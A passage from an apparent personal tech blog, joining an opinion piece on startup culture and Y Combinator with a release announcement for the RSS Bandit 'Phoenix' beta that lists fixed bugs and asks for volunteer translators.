From that perspective I don't think Austin is right to completely rail against the startup lifestyle. However I totally agree with the general theme of Austin's post that working ridiculous hours is dumb. It should be common knowledge that sleep deprivation impairs brain function and may even lead to psychiatric disorders. The code you check in during your 14th hour at your desk will not be as good as what you checked in during your 4th. If you really have to work that much, work on the weekends instead of spending over 12 hours sitting in front of your IDE. Even then, busting your butt to that extent only makes sense if you get to share not only the risks of failure but also the rewards of success. This means you had better be a co-founder or someone with equity and not just some poor sap on salary.

My issue with Paul Graham's essay and the investment style of YCombinator is that it sells startup founders short. Paul recently wrote an essay entitled Cities and Ambition where he had this beautiful quote about the kind of "peer pressure" the Silicon Valley area exerts on startup founders

When you ask what message a city sends, you sometimes get surprising answers. As much as they respect brains in Silicon Valley, the message the Valley sends is: you should be more powerful.

That's not quite the same message New York sends. Power matters in New York too of course, but New York is pretty impressed by a billion dollars even if you merely inherited it. In Silicon Valley no one would care except a few real estate agents. What matters in Silicon Valley is how much effect you have on the world. The reason people there care about Larry and Sergey is not their wealth but the fact that they control Google, which affects practically everyone.

Read the above quote again and let its message sink in. The great thing about software is how you can literally take nothing (i.e. a blank computer screen) and build something that changes the world. Bill and Paul did it with Microsoft. Larry and Sergey have done it with Google. Jerry and David did it with Yahoo!, and some might say Mark Zuckerberg is doing it with Facebook.

Are any of those companies YCombinator-style, built-to-flip companies? Nope.

I strongly believe in the idea behind the mantra "Change the World or Go Home". Unlike anything that has come before it, the combination of software and the World Wide Web has the potential to connect people and empower them in more ways than humanity has ever seen. And it is possible to become immensely rich while moving humanity forward with the software that you create.

So if you have decided to found a startup, why decide to spend your youth building some "me too" application that conforms to all the current "Web 2.0" fads in the desperate hope that you can convince some BigCo to buy you out? That sounds like such a waste. Change the world or go home.

Now Playing: Wu-Tang Clan - Triumph


 

It's been just over a month since we released the alpha of the next release of RSS Bandit codenamed Phoenix. Below are a couple of posts about the alpha from some popular blogs

The tone of the feedback was generally the same. People were very interested in the synchronization with Google Reader but were dissatisfied due to bugs or performance issues. I hadn't expected so much interest in an alpha release otherwise we would have been more diligent about bug fixing and performance improvements. Anyway, there was a ton of great feedback and we fixed a bunch of bugs including the following issues

  • Application hangs on shutdown due to search indexing [bug 1967898]
  • Feeds in tree view not sorted in alphabetical order [bug 1999533]
  • Mouse wheel doesn't work when attempting to scroll feed list [bug 1999534]
  • Removing a synchronized feed source deletes all items across all feed sources [bug 1999800]
  • Exception when loading feed list from NewsGator Online [bug 2000390]
  • Feed logos are broken image links in feeds synchronized from NewsGator Online [bug 2000764]
  • Context menu for a feed source doesn't contain the option to remove the feed source [bug 2000808]
  • Exception when loading feed list from Google Reader [bug 20001419]
  • Space not accepted in Name field of Synchronize Feeds dialog [bug 20001908]
  • Google Reader synchronizes feeds but not items within feeds [bug 2001911]
  • Favorite icon not downloaded for Google Reader feeds [bug 2001915]
  • Selecting Unread Items search folder displays error message [bug 2001916]
  • Incorrect NewsGator or Google Reader password cannot be changed [bug 2002144]
  • Crash on attempting to download an enclosure [bug 2004646]
  • Google Reader password communicated over the wire in plain text [bug 2005154]
  • Option to take over network settings from Internet Explorer does not allow specifying proxy server password [bug 2005687]
  • Unable to play a downloaded video from the Download Manager [bug 2005854]
  • Media keeps playing after closing a browser tab [bug 2014408]
  • Custom column layouts not remembered for specific feeds [bug 2022242]
  • Category dropdown in Add Subscription Wizard doesn't match selected feed source [bug 2026658]

There were also a couple of performance and memory usage improvements made along the way. I still have one or two issues that I've had problems reproducing, such as a situation where we end up getting a streak of timeouts while waiting for HTTP responses from Google Reader. I suspect it has to do with making lots of requests to a single domain in rapid succession when you're behind a proxy server, but I might be wrong. Despite that one issue, the application is now a lot more usable and is feature complete for the release. If you hit that issue, you can either wait a couple of minutes before retrying to refresh feeds or restart the application to clear it up.

You can download the beta version of Phoenix from RssBandit.Phoenix.Beta.Installer.zip. There are two files in the installer package; I suggest running setup.exe because it validates that you have the correct prerequisites to run the application and tells you where to get them otherwise.

If you have any problems feel free to file a bug on SourceForge or ask a question on our forum. Thanks for using our software.

PS: As RSS Bandit is a hobbyist application worked on in our free time, we rely on the generosity of our users when it comes to providing translations of our application. If you look at the supported language matrix for RSS Bandit, you'll see the languages in which the application has been translated in previous versions. We would love to get translators for those languages again and for any new languages as well. If you'd like to provide your skills as a translator for the next release of RSS Bandit and believe you can get this done in the next month or two then please send mail to . We'd appreciate your help.

Now Playing: Lil Wayne - Best Rapper Alive


 

Categories: RSS Bandit